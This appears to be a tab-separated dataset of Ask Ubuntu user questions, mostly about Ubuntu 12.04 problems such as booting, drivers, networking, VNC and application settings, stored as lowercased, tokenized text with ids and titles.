172188	pdf editor that can save annotation and comments for other platforms and viewers	i am using ubuntu 12.04 . i collaborate with others on academic papers and they frequently send pdf versions of the document we are working on with comments and annotations to me . in this case they placed comments using a pdf editing software on mac . i can view their comments using okular -- but when i insert any comment or annotations using okular on the pdf they are not able to see it . to clarify , the pdf editing software itself does not have to be cross platform , as long as the result can be saved and viewed on other platforms . how can i add comments and annotations to pdf file so they are viewable on other platforms and popular pdf viewers . i am looking for a reliable solution . missing annotations can result in serious miscommunication when collaborating with others remotely . ps : this is not a duplicate of this post on viewing comments since i am looking for a solution that let me reliably annotate and comment on pdf files and email them to others for viewing .
172190	internet not running on ubuntu server 10.04	i am not able to connect to the internet via vm virtaul box . these are my configurations but i can ping to the sever via window cmd
172192	failed upgrade 11.04 to 12.04	i did an upgrade from 11.10 to 12.04 but it did n't go as expected and ubuntu asked me to do a partial upgrade . as far as i know , everything went perfect and now i have 12.04 . but whenever i check for updates or run the sudo apt-get update command , ubuntu keeps installing the same number of similar packages over and over again . according to my concern , i think even though it says the updates are fully installed they did n't get installed properly . and when i restart the pc once again , i have to install those updates . please help . terminal update details
172193	how do i stop thunderbird from forgetting my passwords ?	i 'm using thunderbird for quite a while now and have successfully ported all my emails - some of them several years old - from my windows7 setup to ubuntu . my thunderbird contains five different email accounts , one of which is a googlemail account using two-step-verification . now here 's the problem : ever since updating to ubuntu precise 12.04 , thunderbird keeps forgetting my passwords . when trying to retrieve mails it states : 'login or password incorrect ' for every single one of my accounts . i then chose to 're-enter password ' and ticked the option to 'use password manager to save password ' . while this always worked , it never survived a logoff or reboot . i always had to reenter the same passwords after every logon again and again . how can i force thunderbird to actually remember my passwords forever ?
172198	ubuntu package for gnome system admin guide ?	is there a documentation package available for gnome system administrator 's guide ? http : //library.gnome.org/admin/system-admin-guide/stable/ i wish to have a offline copy preferably as a ubuntu package . the website does not provide any links for download .
172200	enabling middle-click and gestures on multitouch clickpad ? ( ubuntu 12.04 ; samsung np900x3a-a03us )	out of the box ( with the xorg.conf from the ubuntu wiki ) , left-click , right-click , and two-finger scroll all work flawlessly . however , middle-click does n't work at all ( despite appearing to be properly configured in xorg.conf ) and touchegg ( compiled from svn ) does n't do anything . i 'm also running the latest xorg from ubuntu-x-swat and kernel 3.5 from kernel-ppa ( quetzal ) .
172202	unwanted asian language set on my ubuntu 12.04 lts	on my ubuntu 12.04 lts , unwanted asian language ( i cant tell which ) is set . odd thing is i kept choosing english us all along , but i still get this garbage mixed in the icon definitions , firefox icon is messed up , other arent , then top-left most menu description is gone . i saw this post unwanted chinese language got set in system settings but the fix described there did not work for me . i looked in my .profile , .bashrc , /etc/profile , there are no language settings there . any ideas ?
172203	touchpad stops working sometimes on thinkpad t410	my touchpad stops working accidentally , what can be the problem ? only rebooting helps .
172208	ubuntu 12.04 and netbeans 7.2 ?	i installed 12.04 , then i installed all updates in update manager . after this , i installed all the necessary applications and installed netbeans 7.2 . but now i am trying to launch it from dash home and it does not start . please help .
172210	vim & colors from ansi escape sequences : how to display in vim the same colors that are displayed with the cat command	here 's what i 'm doing : i 'm echoing through php colors like this : php creates output containing ansi escape sequences that color text when it is displayed through the shell on my terminal . you can find the php class and explanation here . but if i send my output to a file , and try to read it with vim it 's not `` colored '' , i just can see the special characters . is there a way to display the colors like they are displayed in the shell ?
172211	how to find the php folder when configure one software ?	when i want build-mapserver with php/mapscrit module , i should use the ./configure -- with-php= ../php-4.3.11 ( the dir of php ) , but i do not know the php dir on my os . i apt-get install the php and i locate php on the shell but i seem to get an unrelated result .
172217	apache2 - php5 file upload and post max size	i 've installed from the official repos the lamp server . into the file /etc/php5/apache2/php.ini i 've changed post_max_size = 8m to post_max_size = 32m and upload_max_filesize = 2m to upload_max_filesize = 16m . after that i 've restarted the apache2 server and also the notebook but when i launch the phpinfo i got the post_max_size set to 8mb : ( the only way to resolve this bug is to set the php_value ... .. into an .htaccess but this is not what i want ... : ( how can i resolve this ? thanks in advance !
172221	can i use this list of applications in ubuntu ?	these are my software needs : 3ds max 2013 maya 2013 photoshop cs5 topogun rc1 zbrush 4r4 after effects i want to install ubuntu onto my asus laptop , but worried that the above software will not work in ubuntu even using wine . what opinions or suggestions could you give a linux beginner . should i stay with windows 7 or is ubuntu a possibility ? thank you for all the great responses . i realized i forgot to mention that i have a newly built up desktop computer i built myself to go beyond the recommended requirements of the above mentioned software . i hear and read great things about ubuntu and figured i would see if it would be feasible to install ubuntu onto my laptop and use the above software if i am up and about . i guess linux will have to wait until the software above is made for it . too bad though , linux sounds like a really good os .
172226	no os found when i boot with usb	no os found when i boot with ubuntu 12.04 lts usb . i installed ubuntu with live cd to my usb . i also fail with unetbootin . also no os found . it seems that my computer does not support booting with usb ( i do n't think so since there is a choice in bios called removable device . ) i choose the boot with removable device , is it right ? moreover , i have tried to boot it in virtualbox and i can load the ubuntu without any problem . i am using lenovo h410 . is it the bios problem ? lastly can i install ubuntu on dvd rw ?
172227	screen brightness and keyboard backlight works in unity , not in kde	i have ubuntu 12.04 and sony laptop , and i 've installed nvidia driver . screen brightness changing ( with keyboard fn keys ) and keyboard backlight works in unity , but it does n't in kde . when i issue the command : echo 8 > /sys/class/backlight/acpi_video0/brightness it changes brightness , but it does n't anything when i press brightness functions keys , even displaying a bar . and also when i enter : echo 1 > /sys/devices/platform/sony-laptop/kbd_backlight it turns on keyboard backlight but it is not turned on by default . the best practice is what happens in windows : turn it on when you 're in a dark place , using a light sensor . thanx for your help ; )
172228	chromium completely shutting down	so this may sound a little weird , but my problem is that every time i start chromium i have to login everywhere again ( facebook , gmail etc . ) no matter when i last logged in the last time . i turn on my computer and start chromium ( it now asks me to unlock my keyring ) and i start facebook and i 'm asked to log in . when closing chromium now and starting it again i have to login again . i 'm using ubuntu 12.04 64-bit , on my laptop i 'm using ubuntu 12.04 32-bit and the same version of chromium and there 's no problem like that . the main difference i figured is that when shutting down chromium on my laptop , some chromium-browser processes keep running in the background which do n't on my new pc . any idea what may be the cause ? thanks in advance for any help , julian
172233	how to prevent shutdown on certain condition ?	background i am using rsnapshot to backup my machines to a remote nfs nas device . this is somewhat tricky to use with my laptop since it is not guaranteed to be online at a specific time and for a necessary time span . also , the user needs to be logged in due to ecryptfs < > nfs difficulties . because of that , i trigger the backup on user login using upstart . i also do a simple time check because it is possible for the user to boot more than once a day and running backups every time would be inefficient . if the user decides to reboot/poweroff/logout before the backup is complete , a problem arises . a resume function is not supported in rsnapshot as far as i know and having an incomplete backup is very undesirable . question is there a way to `` warn '' the user if he wishes to reboot/poweroff/logout from gnome ( unity/lightdm ? ) session before the backup being completed ? i am thinking of something similar to the dialog saying `` program xy is still active [ ... ] '' . it would be nice if this could be done via some programmatic condition , eg if [ -e /run/backup_is_running ] ; then show_warning ( ) ; fi
172242	sapphire hd 7770 no audio on hdmi tv display	i have sapphire hd 7770 and can not get work audio over hdmi . http : //www.sapphiretech.com/presentation/product/ ? cid=1 & gid=3 & sgid=1159 & lid=1 & pid=1452 & leg=0 i use ubuntu 12.04 lts 64-bit version with all current updates . i tried at /etc/default/grub : grub_cmdline_linux_default= '' quiet splash radeon.audio=1 '' ... it did n't help . it 's probably i use proprietary driver -this seems to be open source driver . i use the driver , what jockey-gtk ( additional drivers ) offered me : ati/amd proprietary fglrx graphics driver < -- -- i installed that one ati/amd proprietary fglrx graphics driver ( post-release update ) so - i installed the first one , because installing second version failed . everything went fine but no sound at tv display by hdmi . even gnome sound mixer does n't show hdmi choice . using 32 '' samsung b530 lcd tv - http : //www.lcdbesttv.com/2010/02/samsung-b530-series-lcd-tv/ i have asus p8z77-m motherboard - http : //www.asus.com/motherboards/intel_socket_1155/p8z77m/ - there is also hdmi integrated . when i put hdmi cord to that plug , then even gnome sound mixer showed hdmi audio but it did n't work . i have set from bios , that i use that sapphire hd 7770 from pcie . my lspci output : 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation ivy bridge pci express root port ( rev 09 ) 00:02.0 display controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.5 pci bridge : intel corporation panther point pci express root port 6 ( rev c4 ) 00:1c.6 pci bridge : intel corporation 82801 pci bridge ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati device 683d 01:00.1 audio device : advanced micro devices [ amd ] nee ati device aab0 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 09 ) 04:00.0 pci bridge : asmedia technology inc. asm1083/1085 pcie to pci bridge ( rev 03 )
172244	how do i delay usb startup on boot ?	i am using zoneminder with a usb web-cam and also analogue inputs from a pci capture card . sometimes when the server boots , usb is detected first ( and assigned /dev/video0 ) and at other times the capture card is detected first ( and assigned /dev/video0 - /dev/video3 as its a 4 channel card ) and usb is assigned /dev/video4 . i am after some way to force the system to only detect usb and the capture card in a certain order so the assignments do n't change between boots .
172245	how do i install ubuntu on multiple computers ( something like ghost ) in a easy way ?	one of the local college in my home town in india is planning to implement mass distribution and usage of ubuntu linux for the purpose of education . i have been asked by my cto to look into the matter and bring out some valuable suggestions with which we can roll out multiple installations on more than 450 computers ! i have know a way in windows that uses the ghost technique to address this issue . our purpose is similar in this case but do n't know how to proceed further . i have been using ubuntu for the past six months to get the feel and understanding of the os and i have to admit it that from the very first day , i was almost into it learning , reading , learning and asking others to use it too . just amazing ! help in any form is appreciated . note : all the 450 computers are of different configurations/variety of different motherboards , hard drives , ram , etc . but they all meet the minimum criteria for ubuntu installation 's hardware requirement .
172259	12.04 desktop wo n't boot	both 12.04 desktop download and burn to dvd+rw given checksum clearance but toshiba laptop and samsung netbook ignore ubuntu and load windows . running out of swear words - and ideas other than start again .
172260	how to get emacs keybindings in firefox using mate ?	i have the following line in my ~/.gtkrc-2.0 file : gtk-key-theme-name = `` emacs '' and that works fine in firefox and e.g . gnome-charachter-map if i use gnome classic to log in . pressing ctrl-a in this text field sends the cursor to the start of the line as expected . if i use mate installed from the 12.04 repository on mate-desktop.org then the emacs keybindings are not honored . ctrl-a selects all text . i think that the .gtkrc-2.0 file is read for some mate applications - mate-terminal seems to understand gtk-keynav-wrap-around = 0 , for example . the other questions that suggest using 3rd party programs seem a bit flakey . is there a better way to get mate to use .gtkrc-2.0 and in particular the emacs key bindings ?
172263	( firefox:6252 ) : pango-warning ** : shaping failure , expect ugly output . shape-engine='basicenginefc	i 've been facing a rather unusual problem with browsing websites on firefox , its never happen before and the weird part is that chromium is able to load all the websites flawlessly , its only firefox going bonkers . some websites like omgubuntu , facebook and vimeo load making a mess on the screen . this is the error message i received when i tried opening firefox in safemode from the terminal . ( firefox:6252 ) : pango-warning ** : shaping failure , expect ugly output . shape- engine='basicenginefc ' , font= ' @ font-face : droid sans 17.3330078125 ' , text= ' ' any one out there with the same problem ?
172265	how to use a common clipboard for vim and unity ?	on my mac i solved the problem this way : : set clipboard=unnamed on my debian i use the + clipboard : : set clipboard=unnamedplus however the methods above do n't work on my ubuntu 12.04 with unity desktop environment . does anyone know how to fix this ?
172269	connected to the internet but ca n't download softwares	i am using wifi connection . i am using my internet smoothly on ubuntu . downloading directly from server and everything goes on smoothly , but when i open terminal window to download vlc ( other softwares also ) , the following error appears : failed to download repository information . check your internet connection . no address associated with hostname w : failed to fetch something wicked happened resolving 'in.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch something wicked happened resolving 'extras.ubuntu.com : http ' ( -5 - no address associated with hostname ) can you help me with this error .
172271	why is my canon printer only printing half-pages ?	ubuntu 12.04 , cups 1.5.3 , canon i550 printer configuration the i550 , i560 and i850 prints on a half side only with a driver . it 's i550 driver from more viewpoints is unusable . what should i do ?
172273	unable to boot into ubuntu after re-installing windows 7	i installed ubuntu alongside windows 7 and everything worked well . but a problem arose where i had to reinstall windows 7 so i did . but after the install , i am no longer able to boot into ubuntu , there is no screen that allows any options , it loads directly into windows 7 . any solutions to solving this without having to re-install ubuntu ? when i re-installed windows 7 , i was cautious enough to not install it accidentally on the ubuntu partition and only install it on the windows partition . the ubuntu partitions and swap area is still there so i believe i have n't lost anything , i 'm just unable to boot into ubuntu .
172274	i want ubuntu to behave like an internet server	i want my ubuntu install to behave like an internet server - i want local computers around to have wireless connection to and run apps installed on this server . how do i configure this ? any other software or a hardware requirements i need to understand .
172280	how do i change the theme and window border color ?	is it possible to customise the colours for the desktop theme and window appearance in pangolin 12.04 as it was possible in narwhal ? i only see four default choices in the display adjustment selection .
172289	how do i set guayadeque as the default music player ?	my choice of music player is guayadeque . it does not appear in my list of properties/open with/show other applications . i presume something needs editing , but can someone advise what ? the `` possible duplicate '' does not help here as that route currently only provides `` movie player '' as the current selection , and no amount of clicking etc provides any method of selecting anything else . at least using the right click on an mp3 file followed by properties/open with/show other applications gives a selection of programs to choose from , but guayadeque is not there . nor can i get to the file system to click on it directly ( ? ) . it does however show under the top level `` open with '' but of course that does not set it as the default . i am presuming that the list of players or the properties and categories of files is held in a system file somewhere which i can edit to either add guayadeque to the open with defaults , or to change the properties of guayadeque itself to show it is capable of playing music files and therefore show up in the list ?
172293	alt + ascii code like in windows	is there a way to do alt+ascii code for typing ascii code in ubuntu like one can do in windows ? if so , then how to do it ? i understand there is a way to do ctrl+shift+unicode code , but i would like to do it in windows style .
172296	`` fatal error , no screen found '' when installing 12.04 with live usb	i have downloaded 12.04 and made a bootable usb flash drive . then i installed this version on my laptop ( dell vostro 1510 ) . unfortunately my laptop does not run with ubuntu . actually just after the appearance of the ubuntu logo the display disappears . when i try to run commands through the command line it does not work neither and the error is the following : fatal error , no screen found . i should mention that the laptop works properly with the bootable usb flash . please let me know if there is a solution for this problem .
172301	installation problem when running ubuntu from cd	i have tried to run ubuntu from a cd . it has loaded with 4 screens and seems to be the wrong resolution for my laptop . i have mouse control but can not click on anything to try and resolve this problem . can you advice please ?
172306	download whole folder from ubuntu one	how do i down load a whole folder from my ubuntu one account that is up loaded regularly from my computer . i did a fresh install to ubuntu 12.04 and need to reinstall my thunderbird and other file . thanks , bob .
172308	banshee stops autoplaying , i must manually click on the song to play	when i use banshee i usually shuffle my library of music ~3000 songs mostly in flac . sometimes it reaches a song and stops playing , it has the song lined up but never plays . i have to manually double click on the song to make it play and everything continues . it wo n't work if i use the play/pause keyboard shortcut either so it 's a bit annoying . i 've run it in debug mode and there are not warnings and errors . can anyone point me in the right direction .
172310	how to sync firefox across multiple operating systems/computers . without firefox sync if possible	i have one desktop computer with vista/ubuntu 12.04 dual-boot , and one netbook with xp . the netbook is usually far away from the desktop computer ( i.e . rarely on the same network ) . i would like to share firefox browsing history and bookmarks across the different computers/operating systems . similar to this can i share same bookmarks db among firefox installations in ubuntu and windows ? , although multiple physical computers are involved . firefox sync might seem like the obvious option , but i like to solve my problems without creating user accounts and subscribing to new services , if possible/reasonable ( even if said services are free ) . the question is , is it possible to achieve this without sync ? secondly , if possible , is it reasonable ? my first thought was to use dropbox ( which i already have set up on the two computers ) , and sync configuration files that way . i 'm guessing that would require symlinking in ubuntu . could i then symlink similarly in the other operating systems ? would this mean trouble if i have different versions of firefox involved ? what if the two computers are running firefox at the same time ?
172312	stuck with `` launching new emulator ''	i 'm a windows user and i decided to use ubuntu 12.04 for developing android apps i googled instruction for installing sdk and jdk.. i follow every steps.. and i 've create a test application `` hello world '' using android 2.1 and here is the problem.. [ 2012-08-05 23:20:46 - testapp1 ] android launch ! < br > [ 2012-08-05 23:20:46 - testapp1 ] adb is running normally. < br > [ 2012-08-05 23:20:46 - testapp1 ] performing joshua.testapp1.mainactivity activity launch < br > [ 2012-08-05 23:20:46 - testapp1 ] automatic target mode : preferred avd 'dev2.1 ' is not available . launching new emulator. < br > [ 2012-08-05 23:20:46 - testapp1 ] launching a new emulator with virtual device 'dev2.1' yep.. thats all in the console.. and no emulator showing up ... .
172313	show unity launcher links in dash	i have added a couple of links to the unity launcher dragging .desktop files to it i save them in ~/.local/application and then drag them to the unity launcher but when i call the dash ( win key ) they do n't appear in it ... all i get it the myapp.desktop file ... is there some way that they can show up in the dash ?
172314	how to restrict an user to a specific desktop environment	i 'm running a more or less standard installation of ubuntu precise 12.04 and i am quite satisfied with doing everydays task with unity desktop environment . when it comes to playing , however , i feel much more comfortable with lxde ( background : in it 's current state , unity archieves much lower framerates than e.g . unity 2d or lxde - it 's a known bug and being worked on ) . for that purpose i created a gamer user profile and now i want to restrict it to use lxde desktop environment only . to elaborate this further : when asked to login after boot i want only lxde to appear as an option for the gamer user profile at the login-screen while my standard user profile should still have the option to choose which desktop environment to use . thanks in advance for any insight that may be of help !
172316	problems with installing ubuntu 12.04 alongside windows 7	despite others , the installation shows `` install alongside windows 7 '' option but when i select that option , it asks to remove the installation drive and close the tray if any and press enter . after i press enter , it restarts and opens windows and when i put the cd-r again , it goes back to the option . what shall i do ? i do n't want to delete any files and windows 7 but still want to try out ubuntu 12.04 as i was a former user of ubuntu 11.04 a year or so ago .
172317	where can i get the source code of kde 's folder view plasmoid ?	i want to have a look at the code of the folderview plasmoid ( which is the thing i miss most from kde ) to see if it is in any way similar to the folderview screenlet . the screenlet is so buggy right now it 's virtually useless ( it has n't been updated in two years ) and maybe when i have the time , in like 20 years , i could try to debug/improve it to have it behave more like kde 's far superior plasmoid .
172318	how can i remove the `` bubble/round square '' around the icons and the dash icon ?	i know that the texture files for the launcher are in /use/share/unity/5 but i remember the exact files to `` erase '' . i want to make the icons look like windows 7 icons , with no border around them , as well with the dash home icon . i still want the arrows to the side of the icons to show what application i am using . thanks .
172319	how can i start in safe mode ?	i did a clean install of ubuntu 12.04 on an acer ax1430g desktop . everything went fine until i installed the additional ati driver . when i reboot the computer , my monitor gives a `` signal out of range '' error because i believe the video is being detected at a higher resolution than the monitor supports . how can i force ubuntu to start up in a lower resolution so that i can adjust display properties . i 've already tried editing the /etc/default/grub and un-commenting # grub_gfxmode=640x480 line . i know in windows , you can press f8 on boot to go into a safe video mode so i 'm looking for the equivalent in ubuntu .
172322	how do i pin a website shortcut to the launcher ?	i 'm using firefox . i created a shortcut to a much-used website on my desktop , but when i drag the shortcut icon to the launcher it wo n't stick .
172323	boot screen missing on ubuntu 12.04	i upgraded my system from 11.10 to 12.04 . after pressing the power on button , i do n't get the ubuntu boot screen with the dots . all i get to see is a full black screen until the login screen is displayed . i have a lenovo t420 . i have also enabled the luks encryption and currently , i type the luks passphrase on a full black screen which is accepted and the system continues to boot . is this a known issue on ubuntu 12.04 ? is there a known fix for this issue ?
172327	how do i report bugs on unity-webapps-preview ?	i 'm interested in reporting a bug against the unity-webapps-preview package from ppa : webapps/preview . however , i ca n't seem to find the right way to go about it . things i 've tried ( and what went wrong ) : reporting using ubuntu-bug . ( `` the problem can not be reported : this is not an official ubuntu package . please remove any third party package and try again . '' ) reporting using launchpad website . ( i ca n't find a link . this could be oversight on my part . forgive me if it is . ) using google to figure out how to report bugs against ppas . ( the only suggestion i could find using google seems to be to e-mail the developer directly , which i 'm willing to do only if there 's no better way . ) i would appreciate any advice or insight the community can give me on how to report a bug of this nature . thanks !
172330	adding ppa error	i was trying to add the ppa for ubuntu tweak . i got this error . what does it mean ? joe @ joe-leopard-extreme : ~ $ sudo add-apt-repository ppa : tualatrix/ppa [ sudo ] password for joe : traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 125 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 80 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 60 , 'server certificate verification failed . cafile : /etc/ssl/certs/ca-certificates.crt crlfile : none ' ) joe @ joe-leopard-extreme : ~ $
172331	what configuration is correct for static ip ?	first , yes , this question 's `` question '' will be an exact duplicate of static ip - what am i doing wrong ? , but the question was never resolved in a way that helps . what i am trying to do is make my ubuntu server have a static ip address . i am not entirely sure on the numbers to plug in , but i am sure it has something to do with correctly setting up the dns servers . information i have : i want the address of the computer to be 192.168.1.99 . the router 's address is 192.168.1.1 . the subnet mask is 255.255.255.0 . i assume that the network is 192.168.1.0 . i assume that the broadcast is 192.168.1.255 . according to my router , the dns servers are 75.75.75.75 and 75.75.75.76 . no idea if this is correct or not . this is what my files look like currently : /etc/network/interfaces auto eth0 iface eth0 inet static address 192.168.1.99 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.1 /etc/resolv.conf # these are all commented out , i was trying ideas , but no combinations worked . # nameserver 75.75.75.75 # nameserver 75.75.76.76 # nameserver 8.8.8.8 # search hsd1.nh.comcast.net currently , as with the similar question , i can ping every other computer on my local network . but as soon as i try to ping www.google.com , i get unknown host www.google.com . if anyone has any suggestions , it would help a lot . suggestion : why does n't this custom static ip network configuration work ? ( the first comment )
172349	installed on separate hard drives , wo n't boot	i just built a brand new computer , got ubuntu running once before after install . / , /boot , and /usr on ssd , everything else on hdd . booting from live usb in order to install . like i said it was running once before but i did n't allocate enough space to /tmp and it kept giving me a warning . i attempted a fresh install and now after installation it will not boot .
172364	invalid extent - grub rescue	translation i 've ubuntu 12.04 and artistx on a laptop with a external hdd . these work great . after this i installed these in two pc and i get the next message on both : -error : invalid extent . grub rescue- . i used cd supergrub and tried all their options and it does n't work . on the laptop the grub is on the external disk and i wanted the same for the pc 's . if anyone know the reason of why happens this , i 'll appreciate . texto original tengo instalado en un portátil sobre un disco externo ubuntu 12.04 y artistx , y van de maravilla . pero mi sorpresa es que después de cogerle el gustillo lo fui a instalar en dos pcs de sobremesa , ambos distintos , y lo único que consigo es -error : invalid extent . grub rescue- . he recurrido al cd supergrub , y probado todas las opciones y no hay manera . en el portátil el grub esta en el disco externo y quería que fuese así en los de sobremesa . si alguien conoce la causa de porque pueda pasar esto , se lo agradecería .
172367	how do i find the dependencies when building software from source ?	here is what i have done . i downloaded foxtrotgps.1.1.1.tar.gz as it is the latest to /home/crash/usr/local.src i extracted it to my /home/crash/usr/local/src as directory /foxtrotgps.1.1.1 i then checked all the required packages for the correct level , and they were or if missing , i added them . so i then go to the ftgps directory and do ./configure , and it gets to where it says ; no package 'gtk+-2.0 ' found no package 'gdk-2.0 ' found no package 'gthread-2.0 ' found but the gtk+-2.0 is there , but i do n't find gdk or gthread . and it stops and goes nowhere . what am i doing wrong - what package dependencies am i missing ?
172374	windows computers can not see my ubuntu machine ?	well i have a windows machine and also a ubuntu laptop , my ubuntu laptop can see everything in the network , but windows can not see ubuntu . please remember that i am an absolute beginner to networking and ubuntu , so keep it simple ! thanks in advance .
172377	12.04 multiple screens rotation issue	i have an eeepc netbook running windows xp and ubuntu 12.04 where i connect a 19 '' monitor . i want to set 1440x900 resolution for the monitor but when i press apply the [ rotation ] options are only [ clockwise ] and [ counterclockwise ] , meaning no [ normal ] option like when it 's set to 1024x768 . i tried arandr but when i set 1440x900 the computer stops responding . i also tried a lower resolution and it did the same . i know it is possible , because windows does it , not to mention intel graphics utility , which allows me to set the monitor as primary screen and actually do it . am i doing something wrong ? please consider i have n't used linux for too long , so i would appreciate it if any command line instructions were `` for dummies '' . thanks in advance .
172382	problem with boot from usb installing ubuntu 12.04	i 'm trying to install ubuntu 12.04 using usb . after downloading the iso file , i used pendrive to make bootable usb drive but after restarting my computer , i encounter this error : unknown keyword in configuration file : ... vesamenu.c32 : not a com32r image boot : i need your help as soon as possible .
172384	vnc grey screen and start on boot 12.04	i have 12.04 lts installed and i am trying to get vnc to work . i want to be able to connect to existing sessions , and have it start on boot . i followed this guide and have left a comment to try and fix my problems but no dice . i have also tried all solutions i have found on google , including the one here , but i could not get it to work ( i am missing something easy i am sure ) . when i connect to the vnc session i get a grey screen with three checkboxes : accept clipboard from viewers send clipboard to viewers send primary selection to viewers here is my xstartup : # ! /bin/sh # uncomment the following two lines for normal desktop : unset session_manager # exec /etc/x11/xinit/xinitrc gnome-session -session=gnome-classic & [ -x /etc/vnc/xstartup ] & & exec /etc/vnc/xstartup [ -r $ home/.xresources ] & & xrdb $ home/.xresources xsetroot -solid grey vncconfig -iconic & # x-terminal-emulator -geometry 80x24+10+10 -ls -title `` $ vncdesktop desktop '' & # x-window-manager & i have also edited my to include : /usr/bin/vncserver -geometry 1024x768 it does not start on boot , but when i run the command it starts , but i get the grey screen . any help would be greatly appreciated . thank you ! !
172387	how do i use monodevelop with a gui designer ?	how am i able to use mono develop to make like a vb.net program not using the code but to where it has a window and you can add buttons and all of that .
172391	is `` laptop-mode-tools '' still relevant for 12.04 and the 3.x kernels ?	i 'm using ubuntu 12.04 x64 and trying to choose power management software . laptop-mode-tools have a lot of features , but the only reason why i 'm worry about is that it 's manual and config files are written like for linux 2.6 kernel . but ubuntu currently has 3.2 kernel version , and , as i know , it has a lot of powersaving improvements . that 's why : laptop-mode-tools may be obsolete ; laptop-mode-tools may conflict with new kernel features and destabilize the system . so , the question is - are laptop-mode-tools still relevant for ubuntu 12.04 or ubuntu handles this stuff good by itself ?
172395	ubuntu 12.04 server does n't resolve local domain name	after apt-get upgrade this morning , my ubuntu 12.04 web server does no longer resolve a domain name hosted on it . i also received the error message : '' resolvconf : error : /etc/resolv.conf is n't a symlink , not doing anything . '' i found this question network manager not populating resolv.conf but the solutions provided there did not resolve the problem . creating the symlink in fact caused websites to load very slowly , so i assume there is some sort of ( reverse ? ) dns lookup not working , when i create the symlink .
172399	how do i make the matlab iso from 3 separate tarballs ?	i 've downloaded matlab for linux , and it 's 3 tar files , that i 've to extract to get an iso file . the problem is that it if i extract anyone of them i get an error . any idea ?
172401	i ca n't install ubuntu 12.04 on my pc	i 'm having a bit of a problem while installing ubuntu 12.04 on my pc . i have used both 32-bit and 64-bit versions of it but they both seem to freeze at around the same point during the install ( both from a usb flash drive , i do n't have a cd drive ) . what happens is after selecting either install to hard disk or run from cd all the codes scroll down the screen right before the gui loads , at [ 4.968597 ] mousedev : ps/2 mouse device common for all mice the screen goes off for a second , then comes back on except it 's frozen . i can still turn on and off the num lock and scroll lock , but not caps lock . i have tried pressing ctrl+alt+f1 but nothing happens . this is all happening before the language selection . am i doing something wrong ? my pc is definitely powerful enough to run it . i have : asus crosshair v formula amd phenom ii x4 955 black edition ( no overclocks ) nvidia gtx550ti ( no overclocks ) - i think this might be the problem , i hope it isn't 8gb corsair veangence lp 1600mhz ddr3 seagate barracuda 7200rpm 500gb ( unplugged at the moment ) western digital scorpio blue 7200rpm 500gb ( using this one as main hdd )
172404	how to reset my gtk theme 's defaults ?	i was trying to change the scrollbar 's color 's or contrast to make it more easily noticeable but after using this question 's answers i got this effect on my windows this is my /usr/share/themes/ambiance/gtk-2.0/gtkrc how can i revert to the default theme ( i am using ambience theme right now )
172408	updating realtek wireless driver	so i 've had problems with my wireless for a few months and now i really have to use linux to start programming again so i really need to get this fixed . i 've been searching the web about my problem and appareantly the problem is the driver , so i 'm trying to update it , but i ca n't seem to be able to do so . i 've been following this tutorial : https : //unixblogger.wordpress.com/2011/10/18/the-pain-of-an-realtek-rtl8111rtl8168-ethernet-card/ but i 'm stuck where i have to add the new driver to the kernel with the following command : root @ ubuntu : ~/r8168-8.032.00 # insmod src/r8168.ko insmod : error inserting 'src/r8168.ko ' : -1 file exists i 've tried every `` path '' i can think of and i keep getting errors when i try to add the new driver . any help will be greatly appreciated . also , for more information about my computer ( in case you need its necessary ) everything 's in this link : centrino wireless-n 1000 takes forever to connect and keeps asking for password
172409	how to connect to wireless network at boot automatically ?	is there a package or a simple tutorial how to setup a normal 12.04 ( not server ) with wireless connection on by default ? basically i 'd like to be able to have my pc connected to the network before i login , so i can do ssh and run programs remotely even . i 've looked around but have n't spot any good tutorial yet . could you point me to one ? cheers !
172413	ca n't find `` /sys/devices/system/cpu/sched_mc_power_savings ''	i 'm currently working on ubuntu 12.04 x64 . a lot of manuals about power saving in linux tells about using parameters /sys/devices/system/cpu/sched_mc_power_savings and /sys/devices/system/cpu/sched_smt_power_savings , but they do n't exists in my os . is it about 3.x kernel improvements ? is there any similar ways of turning cpu scheduling in power save mode on ubuntu 12.04 ?
172415	install base system failed : ubuntu server and xubuntu alternate installation	i tried installing ubuntu 12.04 server on my laptop using a usb stick ! ! when it reached the base system installation i received this error ! debootstrap warning warning : file : ///cdrom/portal/main/t/tzdata/tzdata_2012b-1_all.deb was corrupt then it sends me back to the menu where i can choose either to install the base system again or proceed without installing it . the same thing happened when i tried to install xubntu 12.04 alternate on the laptop . although i can install the xubuntu using the normal iso ( gui installation ) with no problems ! i used md5sum and there were no errors . searched the internet and i found the same error but with a different package corrupted . tried their solution which basically choosing ext3 instead of ext4 and still no hope . do you think it is because of the usb ? i mean should i use a cd instead ? my laptop specs : hp dv6 ati radeon hd 6600m processor : amd a6 quad core any suggestions ? ! !
172418	how to back up entire windows 7 os	how to back up entire windows 7 os to be used on another drive as if it were a new operating system ? for example , to use both ubuntu and windows 7 , yet have entire ubuntu partition on the computer and windows on a separate drive or something else . but the os backup would absolutely need to be like exactly the same version as before when first used . is there someone who knows this ?
